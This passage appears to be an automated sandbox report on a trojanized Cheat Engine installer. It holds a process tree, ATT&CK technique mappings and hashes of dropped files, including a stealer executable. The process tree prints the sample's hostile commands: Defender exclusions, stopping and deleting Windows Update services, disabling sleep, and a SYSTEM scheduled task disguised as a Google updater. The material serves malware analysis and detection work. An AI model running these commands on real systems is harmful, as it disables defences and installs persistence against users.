        Launches sc.exe
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\is-41R9I.tmp\_isetup\_setup64.tmp
        
        helper 105 0x44C
        7⤵
        Executes dropped EXE
        
        PID:924
        
        C:\Windows\system32\icacls.exe
        
        "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
        7⤵
        Modifies file permissions
        
        PID:3964
        
        C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe
        
        "C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe" /SETUP
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4536
        
        C:\Program Files\Cheat Engine 7.5\windowsrepair.exe
        
        "C:\Program Files\Cheat Engine 7.5\windowsrepair.exe" /s
        7⤵
        Executes dropped EXE
        
        PID:2848
        
        C:\Windows\system32\icacls.exe
        
        "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
        7⤵
        Modifies file permissions
        
        PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5116
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1116
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1712
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1568
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:212
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4812
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4160
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4456
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1936
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4316
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:3604
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4772
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:3868
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4448
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3424
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:876
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3936
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:2264
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:884
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1564
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3680
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4208
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1816
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4960
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4616
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1296
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:4504
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2016
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4156
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:3216
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2256
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:3008
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:4936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1088
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe ubulqosn
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:3636
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:3592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    PID:1380
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:4080
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe vgyegivgfazcjxdl 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOyRpUwzATAbwxDv0BlAH+ISI2MOv7cXgWh/hEHn9UpTLH2AUxVXP8zWMLLWvPHAJe2SIfhjGncq3xQ+gVn+I4NKh77PPjDPgwHNzByaS5XiUtDR8Md5EhmkOEwD9v8Eh4nbJIewLTK837YGsKnb02yQo3e+jdFtCWzMfMeobPaXFvrKzv2emNNnxavmVO2FkfkcC1DvbnhN7NqgiVLh1FnuRerr7Rs9GSm8wk3eogEBuxtyJF/l7QvFFEn+PmzyQ6wNeX5T4KpCB8N2LdQ7qGf0xREtOLrL2we+R3IiFUCw/PgUnlB9aOUvPUntLmUYwnVg3n39kwuMDyHF7sntpqwSQW5ruNhQsPrhI9EqpLJ48=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2380

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2416

C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe
"C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3148
- C:\Program Files (x86)\WeatherZero\WeatherZero.exe
  "C:\Program Files (x86)\WeatherZero\WeatherZero.exe" /q=DF13AD736A980376E70BDBD10C9A4AFE
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops desktop.ini file(s)
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4332
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a0fev9di.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2224
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD12.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBD02.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1636

C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
"C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5660
- C:\Program Files\McAfee\WebAdvisor\UIHost.exe
  "C:\Program Files\McAfee\WebAdvisor\UIHost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:728
- C:\Program Files\McAfee\WebAdvisor\updater.exe
  "C:\Program Files\McAfee\WebAdvisor\updater.exe"
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:4196

C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
1⤵
PID:5788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe

Filesize
389KB

MD5
f921416197c2ae407d53ba5712c3930a

SHA1
6a7daa7372e93c48758b9752c8a5a673b525632b

SHA256
e31b233ddf070798cc0381cc6285f6f79ea0c17b99737f7547618dcfd36cdc0e

SHA512
0139efb76c2107d0497be9910836d7c19329e4399aa8d46bbe17ae63d56ab73004c51b650ce38d79681c22c2d1b77078a7d7185431882baf3e7bef473ac95dce

Download Submit
C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe

Filesize
236KB

MD5
9af96706762298cf72df2a74213494c9

SHA1
4b5fd2f168380919524ecce77aa1be330fdef57a

SHA256
65fa2ccb3ac5400dd92dda5f640445a6e195da7c827107260f67624d3eb95e7d

SHA512
29a0619093c4c0ecf602c861ec819ef16550c0607df93067eaef4259a84fd7d40eb88cd5548c0b3b265f3ce5237b585f508fdd543fa281737be17c0551163bd4

Download Submit
C:\Program Files\Cheat Engine 7.5\badassets\scoreboard.png

Filesize
5KB

MD5
5cff22e5655d267b559261c37a423871

SHA1
b60ae22dfd7843dd1522663a3f46b3e505744b0f

SHA256
a8d8227b8e97a713e0f1f5db5286b3db786b7148c1c8eb3d4bbfe683dc940db9

SHA512
e00f5b4a7fa1989382df800d168871530917fcd99efcfe4418ef1b7e8473caea015f0b252cac6a982be93b5d873f4e9acdb460c8e03ae1c6eea9c37f84105e50

Download Submit
C:\Program Files\Cheat Engine 7.5\cheatengine-i386.exe

Filesize
12.2MB

MD5
5be6a65f186cf219fa25bdd261616300

SHA1
b5d5ae2477653abd03b56d1c536c9a2a5c5f7487

SHA256
274e91a91a7a520f76c8e854dc42f96484af2d69277312d861071bde5a91991c

SHA512
69634d85f66127999ea4914a93b3b7c90bc8c8fab1b458cfa6f21ab0216d1dacc50976354f7f010bb31c5873cc2d2c30b4a715397fb0e9e01a5233c2521e7716

Download Submit
C:\Program Files\Cheat Engine 7.5\is-0QIHG.tmp

Filesize
15.9MB

MD5
edeef697cbf212b5ecfcd9c1d9a8803d

SHA1
e90585899ae4b4385a6d0bf43c516c122e7883e2

SHA256
ac9bcc7813c0063bdcd36d8e4e79a59b22f6e95c2d74c65a4249c7d5319ae3f6

SHA512
1aaa8fc2f9fafecbe88abf07fbc97dc03a7c68cc1d870513e921bf3caeaa97128583293bf5078a69aecbb93bf1e531605b36bd756984db8d703784627d1877d1

Download Submit
C:\Program Files\Cheat Engine 7.5\windowsrepair.exe

Filesize
262KB

MD5
9a4d1b5154194ea0c42efebeb73f318f

SHA1
220f8af8b91d3c7b64140cbb5d9337d7ed277edb

SHA256
2f3214f799b0f0a2f3955dbdc64c7e7c0e216f1a09d2c1ad5d0a99921782e363

SHA512
6eef3254fc24079751fc8c38dda9a8e44840e5a4df1ff5adf076e4be87127075a7fea59ba7ef9b901aaf10eb64f881fc8fb306c2625140169665dd3991e5c25b

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Program Files\McAfee\WebAdvisor\Analytics\dataConfig.cab

Filesize
74KB

MD5
001aab25a9ed3a8ee5c405901e6078f3

SHA1
939596b653e3ed74a5b76506c62cd68fe5c9265f

SHA256
0210cfddc082f6dfd9eead5d8fb64b5b6b70e8938246cfe8e530bc47c10e05a5

SHA512
702c8b0de00675331daf53075091a773bbc316aa9e4ab142c71640e508e08bcf98f9a828820aaf96adab4d133d5c65468e2294b4003f4d9942d43559dfef5043

Download Submit
C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

Filesize
1KB

MD5
77c38029caf0c696ad57c785fea4f4af

SHA1
bba93d2a5fa1efcbc77dce36e089b03ecac3d403

SHA256
437c81b043ca3b77efdfde4f8f2e317e99d0133f38fbd31089b60f15f79c5087

SHA512
845c0c69bc0ee2a4e1640a37be76b7aa3d20f3ad52115340b71e14f94ddf0cb886868e721ba793c30cc3cb576641a45f130ce549377132ba568b0ba117a7334a

Download Submit
C:\ProgramData\McAfee\WebAdvisor\ServiceHost.exe\log_00200057003F001D0006.txt

Filesize
4KB

MD5
bb2f2bf1b65d9570341f4fe153e302a9

SHA1
fd79a4e21499f7632549d2ab08131873c001027b

SHA256
e2a0e376effc89aced7ea21eb4f4357f38f49bb31ac7baa180e4cced6d7524d4

SHA512
5b312097cb3da7067979b0c89ffe9e52c4fe4a3971782ff0b1db1d3799a2c3a5f8469ec5b6535190068785c495938072589f3a158088d0aa9737dc528899a6a9

Download Submit
C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

Filesize
7KB

MD5
8c468ce40db11d99a6bc98a61c23953b

SHA1
4a5efb657b26c13289dfb979149db540b0bee577

SHA256
70afc0b4d64f92d5bb2656e4b7aeba96e49ebe6262c408d9abee963d190752cb

SHA512
78f5261115575f28f10f3e8b4fa528ae6c73343dc14fe2ef51ea6b62ad9d71cf2ae9f2fc526e30d1d6373f6e6208d2ed2fa69800950227e7a80d7aa1c34d1f0c

Download Submit
C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

Filesize
9KB

MD5
0e717196c437baea7e6f437ab9aae206

SHA1
e66bc51135879e4cf68523d7cd9946ad27d61e9f

SHA256
4561948f84271238dc2fcf12cd5fb6e7c4249f78aabf81b559ee41ce8b448f03

SHA512
2cb3efcdf266243b73990c8fdc39f7fdf927f63f5c025cc68de2f5050388b0100c62ccfacbf0ca7c71ab850e1e9d61bb36e9fba76ecab459917ebdfb884da13f

Download Submit
C:\ProgramData\McAfee\WebAdvisor\updater.exe\log_00200057003F001D0006.txt

Filesize
1KB

MD5
9181d611ad6975d3d0051630396cf509

SHA1
1d8f9e36e1f75ec9d752c97eb891726463102439

SHA256
74bc5e8d5dd1a7e42288b129ebdeddba8afcacd153e5a504d33d4ce5a5d5f4aa

SHA512
6c3ae97396afe20be38ff5f4d290da9270b68be964f0ab1a34d42aca44bc45f20f7f303e76dcb65fcc2609703054b0a140f0c4a5c65c4af793f16a0fe10c60b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
654b6571e6763132e93d8ef72e202673

SHA1
584657d5f14b02868a0f629ebbd4395b6ba1f526

SHA256
a82ca517a8f2332441d05cd57351b5c3e4e3a895fcb556ec65435f4323107731

SHA512
56c1ce7454876fa8fe984f292142a6b30ad964dc2e22ea16deb0760c1ab4023015f873d4a3692d2e61571ed4b893c2e41ac5043db4772756aaa53074e66d838e

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202501051008051\additional_file0.tmp

Filesize
2.7MB

MD5
be22df47dd4205f088dc18c1f4a308d3

SHA1
72acfd7d2461817450aabf2cf42874ab6019a1f7

SHA256
0eef85bccb5965037a5708216b3550792e46efdfdb99ac2396967d3de7a5e0c8

SHA512
833fc291aacecd3b2187a8cbd8e5be5b4d8884d86bd869d5e5019d727b94035a46bb56d7e7734403e088c2617506553a71a7184010447d1300d81667b99310c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe

Filesize
3.5MB

MD5
a4c45aaf11fc601009a5682fd23790ee

SHA1
a8eac848583296b135af5a473fc8ce48af970b65

SHA256
d89c0e12b5fbbe103522fa152adb3edd6afff88d34d2bbf58caf28e9c4da0526

SHA512
cc735b14e4df0260c8302761e52fd84ba06310d2dde96c9089a8066f72b3b93d80c9e6548a18c35ecadd54479e99f80090ac31b7f30b682129b70b93095373a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS031E6C68\setup.exe

Filesize
5.5MB

MD5
71ad4fff7c190194c8a544776b54dcc5

SHA1
088b5a1acf87ddd917c1094d09a039e886df1f32

SHA256
37490d7b909307cf474a081d16d87320bfc05cd0d382b4ce0d2aec4459cea9d9

SHA512
fdf302eddba55c899883efe11df17977529dad6dc6d4c73e3811c01f98c9677de25a02c3aafa772dca78ed6d59a8bd062fec521d7ce385458dec02b4c971a557

Download Submit
C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe

Filesize
28.6MB

MD5
ccef241f10766a2e12298fba4d319450

SHA1
955c0a80105b034ed46941845fc9bdbe8187ee64

SHA256
590d28762bc431046a202d7bbafb31f93fbbbc73a3c2291119b5c1139675b579

SHA512
d20a8f5afab8cd819ab81875ba9dba5c5ebb9ceadf4d53bf19e1e99c4f16d1361aa272f49571c69c6cc375afc8ac2f9c2e0293b5f2bf62f85cc5c23dfb3923f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
571KB

MD5
169b6d383b7c650ab3ae2129397a6cf3

SHA1
fcaef7defb04301fd55fb1421bb15ef96d7040d6

SHA256
b896083feb2bdedc1568b62805dbd354c55e57f2d2469a52aec6c98f4ec2dedf

SHA512
7a7a7bdb508b8bf177249251c83b65a2ef4a5d8b29397cab130cb8444b23888678673a9a2e4b1c74cc095b358f923b9e7e5a91bfa8c240412d95765851f1dd87

Download Submit
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2501051008050214176.dll

Filesize
5.0MB

MD5
41daedcda16a5341463070dbac45624a

SHA1
8a2f6b3653d92a09a49baece476b53988fbf0c52

SHA256
733701d47b47b544d0b96343b521266702bd8e43edcb7c799c9cbaf07c7e3838

SHA512
7ebf69ed5d16ea1909890e6b714630975bc2cc7e3e4075c903ce6c33901b300ff632b1bbdf61558e4487d6fff3d7db78122a0bfa82e4cd57057685e1d1f7d159

Download Submit
C:\Users\Admin\AppData\Local\Temp\SQLite.Interop.dll

Filesize
1.3MB

MD5
0a1e95b0b1535203a1b8479dff2c03ff

SHA1
20c4b4406e8a3b1b35ca739ed59aa07ba867043d

SHA256
788d748b4d35dfd091626529457d91e9ebc8225746211086b14fb4a25785a51e

SHA512
854abcca8d807a98a9ad0ca5d2e55716c3ce26fae7ee4642796baf415c3cfad522b658963eafe504ecaed6c2ecdcdf332c9b01e43dfa342fcc5ca0fbedfe600e

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll

Filesize
410KB

MD5
056d3fcaf3b1d32ff25f513621e2a372

SHA1
851740bca46bab71d0b1d47e47f3eb8358cbee03

SHA256
66b64362664030bff1596cda2ec5bd5df48cc7c8313c32f771db4aa30a3f86f9

SHA512
ce47c581538f48a46d70279a62c702195beacbfafb48a5a862b3922625fe56f6887d1679c6d9366f946d3d2124cb31c2a3eacbbd14d601ea56e66575cdf46180

Download Submit
C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe

Filesize
7.7MB

MD5
9f4f298bcf1d208bd3ce3907cfb28480

SHA1
05c1cfde951306f8c6e9d484d3d88698c4419c62

SHA256
bf7057293d871cac087daab42daf22c1737a1df6adc7b7963989658f3b65f4cc

SHA512
4c763c3b6d4884f77083db5ccada59bc57803b3226294eff2ec3db8f2121ac01ee240b0e822cb090f5320ce40df545b477e323efabdbca31722731adc4b46806

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12vljqtd.dyd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-41R9I.tmp\_isetup\_setup64.tmp

Filesize
6KB

MD5
e4211d6d009757c078a9fac7ff4f03d4

SHA1
019cd56ba687d39d12d4b13991c9a42ea6ba03da

SHA256
388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95

SHA512
17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-MP83I.tmp\CheatEngine75.tmp

Filesize
3.1MB

MD5
e652d75d1d0d3f03b6b730e064e9194c

SHA1
c4220d57971c63a3f0b9f5b68560aedfdec18e64

SHA256
